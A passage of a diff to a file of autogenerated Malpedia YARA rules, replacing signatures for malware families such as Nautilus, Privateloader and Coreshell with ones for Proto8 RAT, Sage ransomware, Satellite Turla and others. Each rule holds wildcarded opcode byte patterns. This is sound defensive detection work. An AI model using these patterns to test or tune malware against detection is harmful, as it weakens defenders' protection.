ff15???????? 85c0 7419 8b4d14 } + $sequence_6 = { 99 2bc2 8bc8 d1f9 8b45ac 99 2bc2 } + $sequence_7 = { ff15???????? 8b0d???????? 51 8b95c8fdffff 52 68ff0f0000 } + $sequence_8 = { c60000 8b4de0 83c101 894de0 8b55dc } + $sequence_9 = { ff15???????? 8985e8faffff 83bde8faffffff 0f84d9000000 b8424d0000 668985d4faffff 8b8df4faffff } condition: - 7 of them and filesize <433152 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Nautilus_Auto : FILE +rule MALPEDIA_Win_Proto8_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bd0f8568-9347-5c4b-aef6-8e7929cf6017" + id = "67c17406-b8bd-51d3-bd06-6c282d2d9ba4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nautilus_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.proto8_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.proto8_rat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "6e0983236c8ba852bb2af3aa295c07b825fa6ac12512321743324e3ea59238a7" + logic_hash = "b74b2b80c633a7bf227b4dcb10a54e0eaa49fb3d590fb7e951e6a918637cc88c" score = 75 quality = 75 tags = "FILE" @@ -173723,32 +176442,32 @@ rule MALPEDIA_Win_Nautilus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bcf e8???????? 8bd8 8bcd e8???????? 85db 8bce } - $sequence_1 = { 85c0 740c 488b4598 4833c7 e9???????? c74424200f000000 e9???????? } - $sequence_2 = { 8bfe 486313 488d0dcc340600 f6040a02 744b 418d46fa 488bcb } - $sequence_3 = { 85c0 7892 488d4c2430 498bd4 e8???????? 85c0 7981 } - $sequence_4 = { ba03000000 4d8bc5 8d4aff e8???????? 4c8be0 4885c0 7509 } - $sequence_5 = { 85f6 750c 33c0 eb3a 488b0b 49890e eb30 } - $sequence_6 = { 85c0 79d6 4c8d45cf 488d55cf 488d4db7 e8???????? 8bd8 } - $sequence_7 = { eb07 c745e006000000 488d45e0 41b912000000 4d8bc4 498bd5 488bcf } - $sequence_8 = { 4883f803 0f8cef010000 488bd3 488bcd ff95c8010000 85c0 0f8599feffff } - $sequence_9 = { e8???????? 85c0 7531 488d4db0 33d2 e8???????? 85c0 } + $sequence_0 = { 7819 8d4a01 0f1f00 488b5b08 4883e901 75f6 eb07 } + $sequence_1 = { f04e0fb13409 483bd0 752b 4885d2 7426 440fb68c24c8000000 498bcc } + $sequence_2 = { 488b4008 48894708 488b4630 488907 488b4630 488b4808 488939 } + $sequence_3 = { 764f 6666660f1f840000000000 458bc1 8bd5 49c1e006 4c034360 4183780800 } + $sequence_4 = { 0f10442428 488b842488000000 0f1100 f20f104c2438 f20f114810 b001 eb02 } + $sequence_5 = { e8???????? 84c0 751d 488b03 488bcb ff5018 488bf0 } + $sequence_6 = { 4053 4883ec20 488d05634f0400 488bd9 488901 f6c201 740a } + $sequence_7 = { f20f114808 0f28cf 488b41e0 f20f594020 f20f114008 488b41e8 f20f594820 } + $sequence_8 = { ff15???????? 85c0 757f ff15???????? 3d002f0000 74be 488b4c2440 } + $sequence_9 = { 8b842490000000 03ce 894c2428 3bc8 0f829afdffff 4c8b7c2440 4c8b642448 } condition: - 7 of them and filesize <1302528 + 7 of them and filesize <2537472 } -rule MALPEDIA_Win_Sathurbot_Auto : FILE +rule MALPEDIA_Win_Kagent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "74231d79-bc89-53a0-abc2-544d7739c735" + id = "03cb1012-1d40-5351-bbf3-a59896f7ae1b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sathurbot_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kagent_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "3f29ba6959f8023f24a58bd7b1fb03852622ec3e610d203883720a7aae8ca8ad" + logic_hash = "0b8f6427b4a4852531dd043f44e54d80aff6015551c819a2c415062a93726e8a" score = 75 quality = 75 tags = "FILE" @@ -173762,32 +176481,32 @@ rule MALPEDIA_Win_Sathurbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b86b2c1f0a b9b2fd990f } - $sequence_1 = { b94d1e0277 0f45c1 e9???????? 3ddc03f324 0f8582f1ffff a1???????? 8d48ff } - $sequence_2 = { e9???????? 81ff6e65f902 7f1b 81ffded97800 ba96b0469a 0f8548e7ffff bfadab28bf } - $sequence_3 = { e9???????? b817aff9fc e9???????? 3dcf25ea47 0f85eef0ffff a1???????? 8d48ff } - $sequence_4 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8d3b4c9a9 b9c79b14fb } - $sequence_5 = { c744240400000000 89f1 e8???????? 83ec0c bafb0541ae b828f7da39 eb8f } - $sequence_6 = { b994a742ce 0f45c1 e9???????? 3d98320e47 0f8561fcffff 8a45ea 8a4deb } - $sequence_7 = { f6c201 ba67157693 b85ee72ce5 0f45d0 e9???????? 3d4c9cd69e 89c2 } - $sequence_8 = { e8???????? 83ec0c 8b45f0 8945d8 894610 89f1 e8???????? } - $sequence_9 = { bf51a32250 81fa39ccdcb8 74d7 ebfe 8b4304 83ec04 890424 } + $sequence_0 = { 84c9 75f9 2bc2 888c2474020000 33c9 89442440 66894c2452 } + $sequence_1 = { e8???????? 8be5 5d c20400 8d4de8 51 c7434c00000080 } + $sequence_2 = { 8b75e8 52 51 e8???????? 8b4508 } + $sequence_3 = { c645fc04 884b48 0f90c1 f7d9 0bc8 51 } + $sequence_4 = { 8bd0 2bd6 0fb70432 0fb70e 2bc1 } + $sequence_5 = { 884608 33c9 b801000000 ba02000000 f7e2 0f90c1 f7d9 } + $sequence_6 = { 57 ff15???????? 85c0 7514 83c604 81fe???????? 7cd7 } + $sequence_7 = { e8???????? 894624 c6462801 8b4624 33c9 895e20 668908 } + $sequence_8 = { 0f858cfcffff 8b542420 8d0411 39442438 8b5378 0f94c1 } + $sequence_9 = { 50 e8???????? 83c404 8a45f3 8b4df4 64890d00000000 59 } condition: - 7 of them and filesize <2727936 + 7 of them and filesize <4972544 } -rule MALPEDIA_Win_Sarhust_Auto : FILE +rule MALPEDIA_Win_Joao_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "50274b48-711c-5f29-acdb-11078c70fee8" + id = "d37cc5ea-3d73-5336-a732-17564803dcb9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sarhust_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.joao_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "0160e7f1d6d7f85de80fabf97a5a855a2c32446045510933894141374e273156" + logic_hash = "86dd7ba6af2ece0f6d3df07328920c1e2520bb8d3e325d921ed8a0a42914959d" score = 75 quality = 75 tags = "FILE" @@ -173801,32 +176520,32 @@ rule MALPEDIA_Win_Sarhust_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff } - $sequence_1 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? } - $sequence_2 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 } - $sequence_3 = { eb08 8b4520 8b4d0c 8908 } - $sequence_4 = { 6801000080 ff15???????? 85c0 7408 ff15???????? } - $sequence_5 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? } - $sequence_6 = { e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? } - $sequence_7 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 } - $sequence_8 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 } - $sequence_9 = { 8d8d4cffffff e8???????? 6a00 ff15???????? } + $sequence_0 = { 8bce 897dfc e8???????? 837de810 c745fcffffffff 720c 8b45d4 } + $sequence_1 = { 8b4e08 2b0e c1f905 3bc8 } + $sequence_2 = { 8d4dd0 51 8bce 897dfc e8???????? } + $sequence_3 = { 50 6a0f 68???????? e8???????? 8b5510 8d8df8feffff } + $sequence_4 = { 8b4804 8b4c3138 c645ef01 4b } + $sequence_5 = { 8d45f8 50 8bce c745f809000000 897dfc e8???????? 8d4df8 } + $sequence_6 = { e8???????? 8b4604 83e7e0 033e } + $sequence_7 = { 8b4c3224 8b443220 c645fc03 85c9 7c15 7f04 } + $sequence_8 = { 8d4dd4 e8???????? 8d4dd0 51 8bce 897dfc e8???????? } + $sequence_9 = { 8b4e08 2b0e c1f905 3bc8 736a 8d7e0c 50 } condition: - 7 of them and filesize <114688 + 7 of them and filesize <2867200 } -rule MALPEDIA_Win_Jolob_Auto : FILE +rule MALPEDIA_Win_Crypmic_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a7a30cc7-8517-58f2-b42f-ed67321f20be" + id = "50202601-a687-564d-add6-7e6f376e5e2e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jolob_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crypmic_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "7066e8000a5c7d67ee5c483efa94c88c66463d1307008135462062b7827f4ff2" + logic_hash = "9041d9d560914890b77f3fcac1afa5aa11364ed26eb5680a449dc6f4542c2153" score = 75 quality = 75 tags = "FILE" @@ -173840,32 +176559,32 @@ rule MALPEDIA_Win_Jolob_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf7 668954242a 668974242e 6683fa0d 750c 66ff442428 } - $sequence_1 = { 57 ff7318 e8???????? eb2d 8b7c2428 83c70c 57 } - $sequence_2 = { ff15???????? eb2e 8b7e1c e8???????? } - $sequence_3 = { 8d45e4 6a10 48 c745f401000000 5b 8945f0 8365f800 } - $sequence_4 = { 8d45f0 50 ffb714080000 e8???????? 85c0 75df 40 } - $sequence_5 = { 8b442404 85c0 7501 40 50 6842200000 ff15???????? } - $sequence_6 = { 8b17 895648 83671000 894714 895f18 890f 8b5104 } - $sequence_7 = { 6683fa0b 741a 6683fa02 7532 } - $sequence_8 = { 77f5 8bc7 5e c3 33c0 5e c3 } - $sequence_9 = { 83ec28 8365f400 53 56 8bf0 8d461c } + $sequence_0 = { 395818 764a 8b7820 03f9 } + $sequence_1 = { 2bc1 74ec 46 3b75fc 770b 8b55f8 } + $sequence_2 = { 8b4de4 894f04 8b4de8 894f08 668b4df0 66894f0c 668b45f2 } + $sequence_3 = { 33d2 8d642400 8d4001 66890c17 } + $sequence_4 = { 50 8b4608 6a08 ff7604 ffd0 } + $sequence_5 = { 33c0 8bcf 66894302 e8???????? } + $sequence_6 = { 43 83c704 3b5818 72bb 5f } + $sequence_7 = { 55 8bec 83ec0c 8b413c 53 8b440878 03c1 } + $sequence_8 = { 5d c20800 8b55fc 8b4224 8d0458 0fb70c08 8b421c } + $sequence_9 = { 8b440878 03c1 8945fc 395818 } condition: - 7 of them and filesize <196608 + 7 of them and filesize <81920 } -rule MALPEDIA_Win_Privateloader_Auto : FILE +rule MALPEDIA_Win_Unidentified_096_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "704976b4-103d-5caa-b3a7-f03a44637bd7" + id = "22c09f40-2011-5730-9e32-986d3f55e0d2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.privateloader_auto.yar#L1-L183" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_096_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "15e13900aae7d6be3cc889a3774b293d4c50bba5cbabc1926697368cc70d28fc" + logic_hash = "5261db5ca22f6df28b3364eb8987d65dbffd712b51f02eb4b92928e711dc9c45" score = 75 quality = 75 tags = "FILE" @@ -173879,41 +176598,32 @@ rule MALPEDIA_Win_Privateloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8965ec 8b55ec 8955e8 8d45f8 } - $sequence_1 = { 894df4 8b55fc 837a1410 7209 } - $sequence_2 = { 0fb64dec 85c9 7408 8b55fc 8b02 8945e8 } - $sequence_3 = { 8b4dec 8b5508 895110 8b4508 8945e4 8b4de8 034de4 } - $sequence_4 = { 8b45d8 8b4ddc 8b55d0 8b75d4 } - $sequence_5 = { 8b4dec e8???????? 8b4df0 e8???????? 8845fc } - $sequence_6 = { 8975d4 8b45d0 8b55d4 5e } - $sequence_7 = { 8b4de8 8b75ec 2bc8 1bf2 894de0 8975e4 a1???????? } - $sequence_8 = { e8???????? 33d2 b93f000000 f7f1 } - $sequence_9 = { 8b4590 8b4d94 8b5588 8b758c } - $sequence_10 = { a3???????? 33c0 5e c3 3b0d???????? } - $sequence_11 = { 896c2404 8bec 81ec68010000 a1???????? 33c5 8945fc 56 } - $sequence_12 = { d81d???????? c9 b8ffffffff 99 c3 56 8b35???????? } - $sequence_13 = { 13f1 83c201 8955e0 83d600 } - $sequence_14 = { 6a04 8d4310 50 6a06 } - $sequence_15 = { 7507 6800008000 eb02 6a00 } - $sequence_16 = { 8b45e4 50 51 52 } - $sequence_17 = { 0bc8 56 57 7529 } - $sequence_18 = { 03d0 8b4d9c 13f1 83c201 } + $sequence_0 = { 896c2444 c744244806000000 896c244c c744245010304000 } + $sequence_1 = { ff15???????? 8bf0 a1???????? 3bf0 } + $sequence_2 = { b021 a2???????? eb56 b040 a2???????? eb4d } + $sequence_3 = { b02b eb11 b02d eb0d f644240c01 740b b02e } + $sequence_4 = { 68???????? 52 e8???????? 83c424 8b4c242a 6683f930 0f8283000000 } + $sequence_5 = { 90 6aff 68???????? 68???????? 64a100000000 } + $sequence_6 = { 8b4c2420 8b54241c 8b442414 51 52 68ff000000 } + $sequence_7 = { 3dff000000 741d 8b4c2420 8b54241c 51 52 } + $sequence_8 = { b029 a2???????? eb5f b021 } + $sequence_9 = { 56 8b35???????? 57 6a14 ffd6 6a10 0fbfd8 } condition: - 7 of them and filesize <3670016 + 7 of them and filesize <25648 } -rule MALPEDIA_Win_Wormhole_Auto : FILE +rule MALPEDIA_Win_Slave_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "02cb6b4c-3f82-593d-8995-30894f37de3e" + id = "2db01cdc-36fb-5960-a7bc-78a56f81c6bb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wormhole_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slave_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "468c0b29b40a7f8149923ac2555699892601064a2e38020dd68e3cf5b3d71577" + logic_hash = "b1287622c49df3c1a2838a3a773babcdc61506504422851d523ef94f6f257153" score = 75 quality = 75 tags = "FILE" @@ -173927,32 +176637,32 @@ rule MALPEDIA_Win_Wormhole_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb1b 3d04000100 752a a1???????? 68???????? 6a06 } - $sequence_1 = { 50 56 e8???????? 83c40c 8d4c2408 8d942414010000 } - $sequence_2 = { ffd3 6a00 6a00 89442418 8d442428 } - $sequence_3 = { e8???????? a1???????? 83c404 50 ff15???????? c705????????00000000 c705????????00000000 } - $sequence_4 = { 75f0 a1???????? 85c0 74d5 e8???????? } - $sequence_5 = { c705????????01000000 68f4010000 ff15???????? 8b15???????? 52 e8???????? } - $sequence_6 = { 85f6 7512 6a04 68???????? 6a28 57 e8???????? } - $sequence_7 = { 6a78 6a28 57 50 e8???????? } - $sequence_8 = { 8b442404 56 57 8b7c2410 6a78 6a28 } - $sequence_9 = { 7564 8b442418 3dff000000 7f59 6a0f } + $sequence_0 = { ff15???????? 85c0 0f84e0020000 6a04 6800100000 6800100000 } + $sequence_1 = { 7514 66837b0600 7405 8a4306 } + $sequence_2 = { 0fbf4720 33d2 50 0fb6c1 68???????? 83c008 } + $sequence_3 = { 730d 810e00000800 808b0603000040 8b4610 808b0603000010 8a55ff } + $sequence_4 = { c74710d5000000 eb10 c7471095000000 eb07 c7471085000000 f70700400000 742f } + $sequence_5 = { c1c90d 33c8 8b7dd4 8b45e8 03fa c1c802 33c8 } + $sequence_6 = { 83ec24 53 32c0 32c9 56 8b7508 } + $sequence_7 = { 8a8e08010000 f6c210 0f8411040000 8b8610030000 0b8614030000 0f84c2000000 f6c240 } + $sequence_8 = { 8bc6 c1c806 33c8 8bc3 3345d4 034da0 } + $sequence_9 = { 8bd8 0b5df4 2345f4 03ca 235de0 0bd8 8b55ac } condition: - 7 of them and filesize <99576 + 7 of them and filesize <532480 } -rule MALPEDIA_Win_Bredolab_Auto : FILE +rule MALPEDIA_Win_Icexloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0b33903d-ad64-555d-936e-aab5345d2509" + id = "f5f07cf1-ebb8-58bc-85cf-c8730868788c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bredolab_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icexloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icexloader_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "adde67d05e7a2d047afa70901aa11c567b41ad799d4fe97c3d9648b79067c4f5" + logic_hash = "3e81383223a4cc1ff73f88f3e7f296bd8191bce05edbae01407537facee45b04" score = 75 quality = 75 tags = "FILE" @@ -173966,32 +176676,32 @@ rule MALPEDIA_Win_Bredolab_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4518 89442410 8b4514 8944240c c744240800000000 } - $sequence_1 = { baffe8a435 89d1 31d2 f7f1 81c200e1f505 89542408 c7442404???????? } - $sequence_2 = { 0f85e8000000 ba???????? 90 31c0 6690 8a8800500010 300c02 } - $sequence_3 = { 57 56 53 b86c140000 } - $sequence_4 = { f2ae f7d1 8d41ff 81c40c090000 } - $sequence_5 = { 8b8318120000 85c0 0f8e88000000 c783381200000c000000 } - $sequence_6 = { 0f85c5000000 8b9560feffff 8b02 3b45dc 7437 } - $sequence_7 = { 5e 5f c9 c3 8db526ffffff b910000000 } - $sequence_8 = { 8b8a1c120000 85c9 0f8ee7000000 31ff 31c0 8d9d20f7ffff 89b514f7ffff } - $sequence_9 = { 85c0 753b 0fb78394010000 338396010000 0d00000080 baffe8a435 89d1 } + $sequence_0 = { 750c 83caff 85c9 7405 8b01 8d50ff 8b4508 } + $sequence_1 = { 8985acfeffff 8b85c4feffff 8b10 894c2408 8b8db4feffff 890424 894c2404 } + $sequence_2 = { 8b4520 8910 c745e001000000 eb0a 90 eb07 90 } + $sequence_3 = { e8???????? ba04000000 0fb7c0 40 8985d0e6ffff 8b85e4e6ffff e8???????? } + $sequence_4 = { c705????????04000000 66c705????????1903 c605????????01 c705????????14000000 c705????????e0d74300 c705????????aa914200 } + $sequence_5 = { 55 ba7c000000 89e5 56 53 83ec30 894de4 } + $sequence_6 = { c705????????00d44300 c705????????95904200 c705????????18e44300 c605????????01 c705????????00000000 c705????????80d44300 c705????????9d904200 } + $sequence_7 = { 83bd14ffffff00 7405 e8???????? e8???????? 8b8d64feffff e8???????? e8???????? } + $sequence_8 = { 57 56 89d6 ba01000000 53 89cb 83ec2c } + $sequence_9 = { b8???????? e8???????? ba0c000000 8d45a4 e8???????? ba???????? b9???????? } condition: - 7 of them and filesize <90112 + 7 of them and filesize <656384 } -rule MALPEDIA_Win_Webc2_Cson_Auto : FILE +rule MALPEDIA_Win_Sage_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9e77cd9b-5577-55ec-9bc9-fce8ae6111d5" + id = "847781b4-d239-5a8c-9601-0e5bac6cb5da" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_cson_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sage_ransom_auto.yar#L1-L164" license_url = "N/A" - logic_hash = "7c0e799e7902791c334e5b7573181538432e1af2060bac92fa55c2a280799f66" + logic_hash = "0e6ae75d84196f5850e13769b0aaa494f43257ce3727ef9fdf2f02bbc3316ba8" score = 75 quality = 75 tags = "FILE" @@ -174005,34 +176715,40 @@ rule MALPEDIA_Win_Webc2_Cson_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8d85f0feffff 50 e8???????? 6a1e 8db5f6feffff 59 } - $sequence_1 = { be???????? 8dbd74ffffff 6a0a f3a5 a4 be???????? 56 } - $sequence_2 = { 50 e8???????? 59 59 ff7508 8d85acfcffff 50 } - $sequence_3 = { e8???????? 59 59 68???????? ff15???????? 53 bf???????? } - $sequence_4 = { 83c410 85ff 743f 85c0 743b 2bc7 } - $sequence_5 = { 8bec 81ec54030000 53 56 8b35???????? 57 33db } - $sequence_6 = { 83f803 0f859c010000 53 53 53 53 } - $sequence_7 = { 8d7d81 885d80 f3ab 66ab aa 6a0f 33c0 } - $sequence_8 = { 8bec 81ec3c060000 53 56 be04010000 } - $sequence_9 = { 5e 5b c9 c20400 c605????????01 be00900100 6800040000 } + $sequence_0 = { 57 56 68???????? e8???????? 83c408 6a00 6a00 } + $sequence_1 = { 8b74246c 57 c7442408adde9e5a b908000000 8d7c240c f3a5 8b742478 } + $sequence_2 = { 6a02 ff15???????? 8bf0 8d471c } + $sequence_3 = { 55 56 894c243c ff15???????? 83f8ff 7541 56 } + $sequence_4 = { 56 57 6af5 ff15???????? 8b15???????? 83c204 52 } + $sequence_5 = { 68e0930400 ffd6 6a02 e8???????? 83c404 68c0270900 } + $sequence_6 = { 0facf014 89442420 c1ee14 8bc6 } + $sequence_7 = { 83c438 833d????????00 7513 e8???????? 50 } + $sequence_8 = { 01410c 8b4310 014110 8b4314 } + $sequence_9 = { 013c13 83c102 46 ebd3 } + $sequence_10 = { 014114 8b4318 014118 8b431c } + $sequence_11 = { 0101 8b4304 014104 8b4308 014108 } + $sequence_12 = { 891c24 89442404 e8???????? 31d2 3955dc 0f86df000000 } + $sequence_13 = { 014110 8b4314 014114 8b4318 } + $sequence_14 = { 0119 117104 83c110 83c210 } + $sequence_15 = { 014108 8b430c 01410c 8b4310 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Coreshell_Auto : FILE +rule MALPEDIA_Win_Satellite_Turla_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f8b1ab7a-5e3f-5f01-8787-4d480849e1bc" + id = "79b83503-3c79-5740-8814-f6490a13be5c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.coreshell_auto.yar#L1-L424" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.satellite_turla_auto.yar#L1-L160" license_url = "N/A" - logic_hash = "23addbe4ab3205859c50e41702fa9e9c554a336132b182d2582fda2f9387a324" + logic_hash = "5508d48c958832fbb5bd1d9983eb0158b4a79197acb610f43056e5475e8173ec" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -174044,70 +176760,38 @@ rule MALPEDIA_Win_Coreshell_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 52 ffd7 ffd0 } - $sequence_1 = { 56 6810270000 ff15???????? be06000000 e8???????? 85c0 7401 } - $sequence_2 = { 56 ff15???????? 83c40c 3bc6 } - $sequence_3 = { c20400 50 a1???????? 6a00 } - $sequence_4 = { 8b15???????? 6a01 51 68???????? 52 } - $sequence_5 = { 50 57 6a08 51 ff15???????? 8bf8 85ff } - $sequence_6 = { 50 ff15???????? 83c404 32db } - $sequence_7 = { 56 6a00 6a00 681c800000 6a00 } - $sequence_8 = { 6a00 6a00 ff15???????? 8bf0 ff15???????? 50 } - $sequence_9 = { 6804010000 6a08 8b15???????? 52 ff15???????? } - $sequence_10 = { 8d4c2400 56 51 6a00 } - $sequence_11 = { 85c0 7402 eb14 c745f000000000 68e0930400 } - $sequence_12 = { 68???????? 50 a3???????? ffd6 a3???????? a1???????? } - $sequence_13 = { 8bf1 8b4604 85c0 7407 50 ff15???????? 8b36 } - $sequence_14 = { ff15???????? ffd0 85c0 7508 ff15???????? } - $sequence_15 = { 68???????? 6800080000 8d85fcefffff 50 ff15???????? } - $sequence_16 = { 68???????? 50 ffd6 6a00 6a00 6a00 } - $sequence_17 = { 51 56 8d442404 6a00 8bf1 50 } - $sequence_18 = { 51 8b0d???????? 52 50 57 68???????? 51 } - $sequence_19 = { 81e1ffff0000 81e1ffff0000 81e1ff000000 81e1ff000000 } - $sequence_20 = { 8d55f0 52 e8???????? 83c408 33c0 8b4df0 64890d00000000 } - $sequence_21 = { ff15???????? 50 68???????? 68???????? 8985f0fdffff 8d85f4fdffff 6804010000 } - $sequence_22 = { 85ed 7476 85ff 7516 8b5c241c 8b0d???????? 53 } - $sequence_23 = { 8b15???????? 57 6a00 52 ff15???????? 8b0d???????? 8bf0 } - $sequence_24 = { 8985f0fdffff 8d85f4fdffff 6804010000 50 ff15???????? 83c414 } - $sequence_25 = { c1e908 81e1ff000000 0fb6d1 52 } - $sequence_26 = { 8b8dd8edffff 51 8d95f4edffff 52 68???????? } - $sequence_27 = { 81e2ffff0000 81e2ffff0000 c1ea08 81e2ff000000 } - $sequence_28 = { 83c414 8d8df4fdffff 51 ff15???????? } - $sequence_29 = { 50 68???????? 8b0d???????? 51 ff15???????? ffd0 } - $sequence_30 = { 6888130000 ff15???????? c745f000000000 c745f400000000 } - $sequence_31 = { 56 51 56 6a01 } - $sequence_32 = { 8be8 8b442410 50 e8???????? } - $sequence_33 = { 8d8dfcefffff 51 ff15???????? ba00080000 } - $sequence_34 = { 50 ff15???????? a1???????? 83c418 } - $sequence_35 = { ffd6 ffd0 68???????? a3???????? } - $sequence_36 = { 57 8b3d???????? 68???????? ffd7 8b35???????? 68???????? 50 } - $sequence_37 = { 8908 813800000000 0f94c2 8b35???????? 8b3d???????? 0faff6 81c601000000 } - $sequence_38 = { 8908 813800000000 0f95c2 8b35???????? } - $sequence_39 = { a3???????? ffd7 8bd8 68???????? 53 } - $sequence_40 = { 53 a3???????? ffd6 68???????? a3???????? } - $sequence_41 = { 5f 5d c3 89e0 c70010270000 } - $sequence_42 = { 5f 5b 5d c3 b81c000000 } - $sequence_43 = { 8908 8b15???????? 89d6 81c609000000 } - $sequence_44 = { bf04010000 57 6a08 ff35???????? ff15???????? } - $sequence_45 = { 29d6 01f0 a3???????? e9???????? } - $sequence_46 = { 8908 8b00 8b5004 8b35???????? } - $sequence_47 = { 29d6 0faff0 31d2 f7f6 } + $sequence_0 = { 0105???????? 81c3b0020000 2945e0 75ae 837dd400 } + $sequence_1 = { 51 8d9514fbffff 52 